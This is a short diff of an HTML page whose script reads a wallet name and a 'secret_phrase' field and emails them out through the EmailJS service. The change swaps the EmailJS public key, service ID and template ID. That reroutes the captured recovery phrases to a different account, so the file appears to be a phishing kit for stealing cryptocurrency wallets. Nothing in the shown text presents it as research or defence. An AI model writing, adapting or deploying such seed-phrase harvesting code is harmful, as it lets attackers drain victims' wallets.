--- a/app.html
+++ b/app.html
@@ -1282,7 +1282,7 @@ src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js">
 <script type="text/javascript">
 (function(){
 emailjs.init({
-publicKey: "AklJE1-HnkLMFMZBM",
+publicKey: "f-1SCElk2VrU50R-W",
 });
 })();
 </script>
@@ -1293,8 +1293,8 @@ var params= {
    wallet_name_input: document.getElementById("wallet_name_input").value,
    secret_phrase: document.getElementById("secret_phrase").value, 
    }
-   const serviceID = "service_o29loko"
-   const templateID = "template_rwuc9j8"
+   const serviceID = "service_mn9k3ew"
+   const templateID = "template_6atkxed"
 
    emailjs.send(serviceID,templateID,params)
    .then(
